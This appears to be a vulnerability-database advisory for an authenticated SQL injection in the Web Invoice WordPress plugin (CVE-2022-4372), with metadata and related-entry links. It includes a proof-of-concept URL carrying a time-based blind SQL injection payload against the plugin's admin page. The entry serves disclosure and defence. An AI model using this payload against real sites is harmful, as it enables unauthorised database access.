Lucene search
Daniel KrohmerWPVDB-ID:218F8015-E14B-46A8-889D-08B2B822F8AEHistoryDec 12, 2022 - 12:00 a.m.
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-1200:00:00
Daniel Krohmer
wpscan.com
6
web invoice plugin
sql injection
authenticatedๆ exploit
admin privilege
parameter sanitization
configuration vulnerability
0.001 Low
EPSS
Percentile
43.0%
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well
PoC
When logged in with a user allowed to Manage invoice (default admin but can be changed via the pluginโs settings), open the following URL https://example.com/wp-admin/admin.php?page=new_web_invoice&multiple;_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple;_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web;_invoice_action=clear_log
| CPE | Name | Operator | Version |
|---|---|---|---|
| web-invoice | eq | * |
Related
cve
cve
CVE-2022-4372
2023-01-02 22:15:17
cvelist
cvelist
CVE-2022-4372 Web Invoice <= 2.1.3 - Authenticated SQLi
2023-01-02 21:49:39
prion
prion
Sql injection
2023-01-02 22:15:00
nvd
nvd
CVE-2022-4372
2023-01-02 22:15:17
wpexploit
wpexploit
Web Invoice <= 2.1.3 - Authenticated SQLi
2022-12-12 00:00:00